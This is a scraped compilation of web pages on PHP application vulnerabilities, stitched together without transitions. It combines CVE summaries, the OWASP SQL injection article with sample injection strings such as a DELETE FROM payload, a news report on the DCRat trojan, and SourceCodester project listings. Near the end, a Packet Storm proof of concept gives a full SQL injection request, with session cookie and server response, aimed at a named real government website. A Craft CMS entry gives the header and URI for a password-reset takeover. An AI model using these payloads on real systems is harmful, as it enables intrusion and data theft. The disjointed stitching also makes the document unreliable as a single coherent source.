Hotel Management System v1.0 was discovered to contain a SQL injection vulnerability via the username parameter at the login page.

**Contributor(s):** kingthorin  

**Overview**

A SQL injection attack consists of insertion or “injection” of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands.

**Threat Modeling**

*   SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.
*   SQL Injection is very common with PHP and ASP applications due to the prevalence of older functional interfaces. Due to the nature of programmatic interfaces available, J2EE and ASP.NET applications are less likely to have easily exploited SQL injections.
*   The severity of SQL Injection attacks is limited by the attacker’s skill and imagination, and to a lesser extent, defense in depth countermeasures, such as low privilege connections to the database server and so on. In general, consider SQL Injection a high impact severity.

**How to Avoid SQL Injection Vulnerabilities**

See the OWASP SQL Injection Prevention Cheat Sheet. See the OWASP Query Parameterization Cheat Sheet.

**How to Review Code for SQL Injection Vulnerabilities**

See the OWASP Code Review Guide article on how to Review Code for SQL Injection vulnerabilities.

**How to Test for SQL Injection Vulnerabilities**

See the OWASP Testing Guide for information on testing for SQL Injection vulnerabilities.

**How to Bypass Web Application Firewalls with SQLi**

See the OWASP Article on using SQL Injection to bypass a WAF

**Description**

SQL injection attack occurs when:

1.  An unintended data enters a program from an untrusted source.
2.  The data is used to dynamically construct a SQL query

The main consequences are:

*   **Confidentiality**: Since SQL databases generally hold sensitive data, loss of confidentiality is a frequent problem with SQL Injection vulnerabilities.
*   **Authentication**: If poor SQL commands are used to check user names and passwords, it may be possible to connect to a system as another user with no previous knowledge of the password.
*   **Authorization**: If authorization information is held in a SQL database, it may be possible to change this information through the successful exploitation of a SQL Injection vulnerability.
*   **Integrity**: Just as it may be possible to read sensitive information, it is also possible to make changes or even delete this information with a SQL Injection attack.

**Risk Factors**

The platform affected can be:

*   Language: SQL
*   Platform: Any (requires interaction with a SQL database)

SQL Injection has become a common issue with database-driven web sites. The flaw is easily detected, and easily exploited, and as such, any site or software package with even a minimal user base is likely to be subject to an attempted attack of this kind.

Essentially, the attack is accomplished by placing a meta character into data input to then place SQL commands in the control plane, which did not exist there before. This flaw depends on the fact that SQL makes no real distinction between the control and data planes.

**Examples****Example 1**

In SQL: select id, firstname, lastname from authors

If one provided: Firstname: evil'ex and Lastname: Newman

the query string becomes:

select id, firstname, lastname from authors where firstname = 'evil'ex' and lastname ='newman'

which the database attempts to run as:

Incorrect syntax near il' as the database tried to execute evil.

A safe version of the above SQL statement could be coded in Java as:

    String firstname = req.getParameter("firstname");
    String lastname = req.getParameter("lastname");
    // FIXME: do your own validation to detect attacks
    String query = "SELECT id, firstname, lastname FROM authors WHERE firstname = ? and lastname = ?";
    PreparedStatement pstmt = connection.prepareStatement( query );
    pstmt.setString( 1, firstname );
    pstmt.setString( 2, lastname );
    try
    {
        ResultSet results = pstmt.execute( );
    }
    

**Example 2**

The following C# code dynamically constructs and executes a SQL query that searches for items matching a specified name. The query restricts the items displayed to those where owner matches the user name of the currently-authenticated user.

    ...
    string userName = ctx.getAuthenticatedUserName();
    string query = "SELECT * FROM items WHERE owner = "'"
                    + userName + "' AND itemname = '"
                    + ItemName.Text + "'";
    sda = new SqlDataAdapter(query, conn);
    DataTable dt = new DataTable();
    sda.Fill(dt);
    ...
    

The query that this code intends to execute follows:

    SELECT * FROM items
    WHERE owner =
    AND itemname = ;
    

However, because the query is constructed dynamically by concatenating a constant base query string and a user input string, the query only behaves correctly if itemName does not contain a single-quote character. If an attacker with the user name wiley enters the string "name' OR
'a'='a" for itemName, then the query becomes the following:

    SELECT * FROM items
    WHERE owner = 'wiley'
    AND itemname = 'name' OR 'a'='a';
    

The addition of the OR 'a'='a' condition causes the where clause to always evaluate to true, so the query becomes logically equivalent to the much simpler query:

SELECT * FROM items;

This simplification of the query allows the attacker to bypass the requirement that the query only return items owned by the authenticated user; the query now returns all entries stored in the items table, regardless of their specified owner.

**Example 3**

This example examines the effects of a different malicious value passed to the query constructed and executed in Example 1. If an attacker with the user name hacker enters the string "name'); DELETE FROM items; --" for itemName, then the query becomes the following two queries:

    SELECT * FROM items
    WHERE owner = 'hacker'
    AND itemname = 'name';
    
    DELETE FROM items;
    
    --'
    

Many database servers, including Microsoft® SQL Server 2000, allow multiple SQL statements separated by semicolons to be executed at once. While this attack string results in an error in Oracle and other database servers that do not allow the batch-execution of statements separated by semicolons, in databases that do allow batch execution, this type of attack allows the attacker to execute arbitrary commands against the database.

Notice the trailing pair of hyphens (--), which specifies to most database servers that the remainder of the statement is to be treated as a comment and not executed. In this case the comment character serves to remove the trailing single-quote left over from the modified query. In a database where comments are not allowed to be used in this way, the general attack could still be made effective using a trick similar to the one shown in Example 1. If an attacker enters the string "name'); DELETE FROM items; SELECT \* FROM items WHERE 'a'='a", the following three valid statements will be created:

    SELECT * FROM items
    WHERE owner = 'hacker'
    AND itemname = 'name';
    
    DELETE FROM items;
    
    SELECT * FROM items WHERE 'a'='a';
    

One traditional approach to preventing SQL injection attacks is to handle them as an input validation problem and either accept only characters from an allow list of safe values or identify and escape a deny list of potentially malicious values. An allow list can be a very effective means of enforcing strict input validation rules, but parameterized SQL statements require less maintenance and can offer more guarantees with respect to security. As is almost always the case, deny listing is riddled with loopholes that make it ineffective at preventing SQL injection attacks. For example, attackers can:

*   Target fields that are not quoted
*   Find ways to bypass the need for certain escaped meta-characters
*   Use stored procedures to hide the injected meta-characters

Manually escaping characters in input to SQL queries can help, but it will not make your application secure from SQL injection attacks.

Another solution commonly proposed for dealing with SQL injection attacks is to use stored procedures. Although stored procedures prevent some types of SQL injection attacks, they fail to protect against many others. For example, the following PL/SQL procedure is vulnerable to the same SQL injection attack shown in the first example.

    procedure get_item (
        itm_cv IN OUT ItmCurTyp,
        usr in varchar2,
        itm in varchar2)
    is
        open itm_cv for ' SELECT * FROM items WHERE ' ||
                'owner = '''|| usr ||
                ' AND itemname = ''' || itm || '''';
    end get_item;
    

Stored procedures typically help prevent SQL injection attacks by limiting the types of statements that can be passed to their parameters. However, there are many ways around the limitations and many interesting statements that can still be passed to stored procedures. Again, stored procedures can prevent some exploits, but they will not make your application secure against SQL injection attacks.

*   SQL Injection Bypassing WAF
*   Blind SQL Injection
*   Code Injection
*   Double Encoding
*   ORM Injection

**References**

*   SQL Injection Knowledge Base - A reference guide for MySQL, MSSQL and Oracle SQL Injection attacks.
*   GreenSQL Open Source SQL Injection Filter - An Open Source database firewall used to protect databases from SQL injection attacks.
*   An Introduction to SQL Injection Attacks for Oracle Developers
    *   This also includes recommended defenses.

Category:Injection

CVE-2022-28110: SQL Injection | OWASP Foundation

Researchers say a hacker is selling access to quality malware for chump change.

Researchers say a hacker is selling access to quality malware for chump change.

For about the price of a cup of Starbucks latte, a hacker is renting out a remote access trojan designed to backdoor targeted networks.

Dubbed as Dark Crystal RAT (or DCRat), the malware is being peddled online to hackers in Russian by a lone rookie malware writer with a penchant for cut-rate pricing.

“DCRat is one of the cheapest commercial RATs we’ve ever come across. The price for this backdoor starts at ($6) for a two-month subscription, and occasionally dips even lower during special promotions,” according to BlackBerry researchers who published their findings on Monday.

  
BlackBerry said sales of the budget RAT are being facilitated by the cybercriminal that goes by the name “boldenis44” or “crystalcoder.”

Capabilities of the RAT include a “stealer/client executable”, a single PHP page, which serves as the command-and-control endpoint and an administrator tool.

**A Breakdown of DCRat**

DCRat is, in some ways, amateurish, researchers assert. “There are certainly programming choices in this threat that point to this being a novice malware author,” they wrote.

“The administrator tool is a standalone executable written in the JPHP programming language, an obscure implementation of PHP that runs on a Java virtual machine,” BlackBerry wrote.

JPHP, they noted, is an easy-to-use language aimed at novice developers of desktop games. “The malware author may have chosen this format because it’s not particularly well-known, or they might have lacked programming skills in other, more mainstream languages.”

In another odd quirk, researchers note, is the malware author “implemented a function that displays a randomly generated number of ‘servers working’ and ‘users online’ that are meant to appear as statistics in the background of the administrator tool. It could be that they are trying to make their tool appear more popular, or that they just didn’t know how to implement an accurate counter and have employed a pseudo-counter in the meantime as a placeholder.”

However, in most respects, DCRat punches well above its weight.

Along with the stealer, command-and-control interface and administrator tool, the malware is highly customizable, demonstrating a higher level of attempted sophistication. The modular architecture allows RAT customers to create and share their own plugins.

“DCRat’s modular architecture and bespoke plugin framework make it a very flexible option,” the researchers wrote, “helpful for a range of nefarious uses. This includes surveillance, reconnaissance, information theft, DDoS attacks, as well as dynamic code execution in a variety of different languages.”

Customization prevents DCRat from growing stale, even after three years. That, and the constant care and attention its author gives it. “The administrator tool and the backdoor/client are regularly updated with bug fixes and new features; the same applies to officially released plugins.” The researchers noted a particular case in 2020, when Mandiant published an in-depth look at the DCRat client. “Just days after this report was released,” to combat the unwanted attention, “the malware author shifted distribution of the RAT to a new domain.”

**Is DCRat an Outlier or an Omen?**

Current is about $7 for a two-month lease. For a year, $33 and for a lifetime subscription $63.

Researchers speculate the low price is because the criminals behind the malware are just looking for attention. “It could be that they’re simply casting a wide net,” the researchers theorized, “trying to get a little money from a lot of maliciously minded people. It could also be that they have an alternative source of funding, or this is a passion project rather than their main source of income.”

It remains to be seen whether DCRat will be an outlier on cybercrime forums, or a new precedent. The implications could be significant. If effective malware is as cheap as a cup of coffee, how many more people might be lured into trying it out? And how much more capable might their attacks be?

“The biggest, flashiest threat groups might get their name in lights,” the researchers concluded, “but they aren’t necessarily the cybercriminals that keep security practitioners up at night.”

Low-rent RAT Worries Researchers

Stored XSS in Add New Employee Form in Sourcecodester Employee Daily Task Management System 1.0 Allows Remote Attacker to Inject/Store Arbitrary Code via the Name Field.

**Online Tutor Portal Site in PHP/OPP Free Source Code**

10 hours ago By oretnom23

Introduction This simple project is entitled Online Tutor Portal Site. This is a web-based application project developed in PHP and MySQL Database. This simple project's main goal is to provide an online platform the individuals that both who are looking for and offering tutorial services. This allows the parents or persons to find a tutor for the specific field they desire. The application has a

*   Read more about Online Tutor Portal Site in PHP/OPP Free Source Code
*   Add new comment
*   98 views

**Online Discussion Forum Site in PHP/OOP Free Source Code**

1 day ago By oretnom23

Introduction This simple project is entitled Online Discussion Forum Site. This is a web-based application project developed in PHP and MySQL Database. This simple project's main goal is to provide an online platform for an organization where they can discuss any topic that is related to the site or organization. The site allows users to post any topic under a certain topic category. Users can

*   Read more about Online Discussion Forum Site in PHP/OOP Free Source Code
*   Add new comment
*   283 views

**Simple Typing Test App using JavaScript with Free Source Code**

3 days ago By razormist

Simple Typing Test App using JavaScript with Free Source Code The Simple Typing Test App with Source Code is a project that can test your speed for typing letters. The system can count the total letter that you entered The purpose of project to test the person speed capabilities by typing a letter by measuring the accuracy. About the Application The Simple Typing Test App was built in a HTML

*   Read more about Simple Typing Test App using JavaScript with Free Source Code
*   Add new comment
*   95 views

**Simple College Management System using C with Free Source Code**

3 days ago By razormist

Simple College Management System using C with Free Source Code The Simple College Management System with Source Code is a project that can help you process process the admission of enrollees in the college. The system has a simple function that can input a college information. The purpose of the system is to give some convenient way for enrollee to process document for entering college. About the

*   Read more about Simple College Management System using C with Free Source Code
*   Add new comment
*   110 views

**Social Networking Site version 2 in PHP/OOP Free Source Code**

3 days ago By oretnom23

Introduction This simple project is a Social Networking Site version 2. This is a web-based application project developed in PHP and MySQL Database. This project is a version of my developed Social Networking Site. The site provides an online platform to virtually interact with other users by sharing posts and photos. The project user interface was developed with Bootstrap Framework and AdminLTE

*   Read more about Social Networking Site version 2 in PHP/OOP Free Source Code
*   Add new comment
*   414 views

**Bubble Popper Game using JavaScript with Free Source Code**

4 days ago By razormist

Bubble Popper Game using JavaScript with Free Source Code Bubble Popper Game with Source Code is a project that is a single-player game where your goal is pop all the incoming bubble. The game design is simple it only contain graphic sprite and a plain background. The purpose of the project is to give some enjoyable and fun moment with your break time. About the System The Bubble Popper Game was

*   Read more about Bubble Popper Game using JavaScript with Free Source Code
*   Add new comment
*   51 views

**Simple Dividing Number Game using JavaScript with Free Source Code**

4 days ago By razormist

Simple Dividing Number Game using JavaScript with Free Source Code Simple Dividing Number Game with Source Code is a project that is a single-player game where your goal is to get all the possible divider number. The game design is simple it only contain text and buttons. The purpose of the project is to provide some fun entertainment past time during your free time. About the System The Simple

*   Read more about Simple Dividing Number Game using JavaScript with Free Source Code
*   Add new comment
*   37 views

**Library Management System in Python using Django Free Source Code**

4 days ago By oretnom23

Library Management System using Django in Python This project is entitled Library Management System. This is a web-based application developed in Python and Django Framework. This simple python project manages the School Library's Borrowing Transaction. It provides an online and automated platform for the management to store and retrieve the books and borrowing records efficiently and effectively

*   Read more about Library Management System in Python using Django Free Source Code
*   Add new comment
*   328 views

**Simple Movie Ticketing System using C with Free Source Code**

5 days ago By razormist

Simple Movie Ticketing System using C with Free Source Code The Simple Movie Ticketing System with Source Code is a project that can help you manage the movie ticketing information. The system has a simple function that can input a movie data. The purpose of the system is to give some fastest way to acquire a movie ticket. About the System The Simple Movie Ticketing System was created in a simple

*   Read more about Simple Movie Ticketing System using C with Free Source Code
*   Add new comment
*   81 views

**Simple Task Scheduling System in PHP/OOP Free Source Code**

5 days ago By oretnom23

Introduction This simple project is a Simple Task Scheduling System. This is a web-based application project developed in PHP and MySQL Database. This project application provides an online platform for users to schedule their tasks. The application simply stores all the scheduled tasks of the users and scheduled tasks are only visible to the user who created them. The application used Bootstrap

*   Read more about Simple Task Scheduling System in PHP/OOP Free Source Code
*   Add new comment
*   706 views

**Pagination**

*   Current page 1
*   Page 2
*   Page 3
*   Page 4
*   Page 5
*   Page 6
*   Page 7
*   Page 8
*   Page 9
*   …
*   Next page
*   Last page

Subscribe to

CVE-2021-43712: Free Source Code Projects and Tutorials

**Simple Train Ticketing System using C++ with Free Source Code**

6 hours ago By razormist

Simple Train Ticketing System using C++ with Free Source Code The Simple Train Ticketing System with Source Code is a project that can reserve a train ticket. The system is so simple that only contains basic design and functions for reserving a ticket. The purpose of the system is to show customer for how to get a train ticket digitally. About the System The Simple Train Ticketing System was

*   Read more about Simple Train Ticketing System using C++ with Free Source Code
*   Add new comment
*   13 views

**Counting Likes in PHP/OOP Tutorial**

11 hours ago By oretnom23

In this tutorial, I will show the simplest way to **Count Likes of Posts** in **PHP** and **MySQL Database**. Here, you will learn how to join a total count of rows from another table in a query. I will be providing a simple source code of a simple blog application that illustrate our main goal for this tutorial

*   Read more about Counting Likes in PHP/OOP Tutorial
*   Add new comment
*   41 views

**Simple Text Editor App using JavaScript with Free Source Code**

1 day ago By razormist

Simple Text Editor App using JavaScript with Free Source Code Simple Text Editor App with Source Code is a project that can virtually let you manipulate your text content. The application was made so simple that only simple function to show the process of a text editor. The project is a user-friendly kind of system, it is made simple so that it can be easier for you to learn the coding process

*   Read more about Simple Text Editor App using JavaScript with Free Source Code
*   Add new comment
*   81 views

**School Dormitory Management System in PHP/OOP Free Source Code**

2 days ago By oretnom23

Introduction This project is entitled School Dormitory Management System. This is a web-based application project developed in PHP and MySQL Database. This project provides an online and automated platform for Universities or Colleges' Dormitory to manage their monthly collections and records. The system consist consists of multiple features that include the student dorm accounts. The application

*   Read more about School Dormitory Management System in PHP/OOP Free Source Code
*   Add new comment
*   493 views

**Badminton Center Management System in PHP/OOP Free Source Code**

3 days ago By oretnom23

Introduction This project is entitled Badminton Center Management System. This is a web-based application project developed in PHP and MySQL Database. This project provides an online and automated platform for Badminton Centers to manage their daily transactions and records. The system consists of court rentals, sales transactions, and service transaction management. The application was developed

*   Read more about Badminton Center Management System in PHP/OOP Free Source Code
*   Add new comment
*   329 views

**Simple Pet Simulator using Python with Free Source Code**

4 days ago By razormist

Simple Pet Simulator using Python with Free Source Code Simple Pet Simulator with Source Code is a project that can let you pet an animal virtually. The application contains a simple function that only demonstrate the pet action. This application is a user-friendly kind of system that can help beginners to learn new programming knowledge. About the Application The Simple Pet Simulator was

*   Read more about Simple Pet Simulator using Python with Free Source Code
*   Add new comment
*   71 views

**ChatBot App with Suggestion in PHP/OOP Free Source Code**

4 days ago By oretnom23

Introduction This simple project is a ChatBot Application with a Suggestion Feature. This is a web-based application project developed in PHP and MySQL Database. This application is a simple ChatBot Application for any site. I developed this application to give new programmers an idea of how to create a ChatBot Feature for their current or future PHP Projects. This was developed with Bootstrap

*   Read more about ChatBot App with Suggestion in PHP/OOP Free Source Code
*   Add new comment
*   417 views

**Simple Telecom Billing System using C with Free Source Code**

5 days ago By razormist

Simple Telecom Billing System using C with Free Source Code The Simple Telecom Billing System with Source Code is a project that can help you process your telecom bill. The system has a simple function that can input a telecom data and payment. The purpose of the system is to give some convenient way for paying your telecom balance bill. About the System The Simple Telecom Billing System was

*   Read more about Simple Telecom Billing System using C with Free Source Code
*   Add new comment
*   122 views

**Automotive Shop Management System in PHP/OOP Free Source Code**

5 days ago By oretnom23

Introduction This simple project is an Automotive Shop Management System. This is a web-based application project developed in PHP and MySQL Database. This project provides an online platform for Automotive or Car Repair and Services shops to manage their daily transaction. The application also includes an inventory feature that allows the shop management to monitor and manage their product stocks

*   Read more about Automotive Shop Management System in PHP/OOP Free Source Code
*   Add new comment
*   693 views

**Simple Social Networking Site Like Instagram in PHP/OOP Free Source Code**

6 days ago By oretnom23

Introduction This simple project is a Social Networking Site. This is a web-based application project developed in PHP and MySQL Database. This is project is inspired by the famous Instagram Site/Application. The application consists of the most used or common features in a social networking site and of course since this project is inspired by Instagram, posting images is also included. This

*   Read more about Simple Social Networking Site Like Instagram in PHP/OOP Free Source Code
*   Add new comment
*   664 views

**Pagination**

*   Current page 1
*   Page 2
*   Page 3
*   Page 4
*   Page 5
*   Page 6
*   Page 7
*   Page 8
*   Page 9
*   …
*   Next page
*   Last page

Subscribe to

Explore CMS v1.0 was discovered to contain a SQL injection vulnerability via a /page.php?id= request.

    # Exploit Title: explore CMS  - Boolean Based SQL Injection# Date: 19/03/2022# Exploit Author: Sajibe Kanti# Vendor Name : EXPLORE IT# Vendor Homepage: https://exploreit.com.bd# CVE: On Request# POC#SQL InjectionSQL injection is a web security vulnerability that allows an attackerto interfere with the queries that an application makes to itsdatabase.explore CMS is vulnerable to the SQL Injection in 'id' parameter ofthe 'page' page.#Steps to reproduceFollowing URL is vulnerable to SQL Injection in the 'id' field.GET /page.php?id=1%27%20OR%201%3d1%20OR%20%27ns%27%3d%27ns HTTP/1.1Host: www.gdc.gov.bdAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-us,en;q=0.5Cache-Control: no-cacheCookie: PHPSESSID=b4c39f2ff3b9470f39bc088ab9ba9320Referer: https://www.gdc.gov.bd/User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36HTTP/1.1 200 OKcontent-encoding:server: LiteSpeedConnection: Keep-AliveKeep-Alive: timeout=5, max=100content-type: text/html; charset=UTF-8transfer-encoding: chunkeddate: Thu, 17 Mar 2022 07:27:21 GMTvary: Accept-Encoding10.3.34-MariaDBServer accepts the payload and the response get delayed by 7 seconds.#ImpactAn attcker can compromise the database of the application by manualmethod or by automated tools such as SQLmap.-- ThanksSajibe Kanti

CVE-2022-27412: Explore CMS 1.0 SQL Injection ≈ Packet Storm

A stored cross-site scripting (XSS) vulnerability in PHProjekt PhpSimplyGest v1.3.0 allows attackers to execute arbitrary web scripts or HTML via a project title.

CVE-2022-27308

Craft CMS through 3.7.36 allows a remote unauthenticated attacker, who knows at least one valid username, to reset the account's password and take over the account by providing a crafted HTTP header to the application while using the password reset functionality. Specifically, the attacker must send X-Forwarded-Host to the /index.php?p=admin/actions/users/send-password-reset-email URI. NOTE: the vendor's position is that a customer can already work around this by adjusting the configuration (i.e., by not using the default configuration).

Tag

#php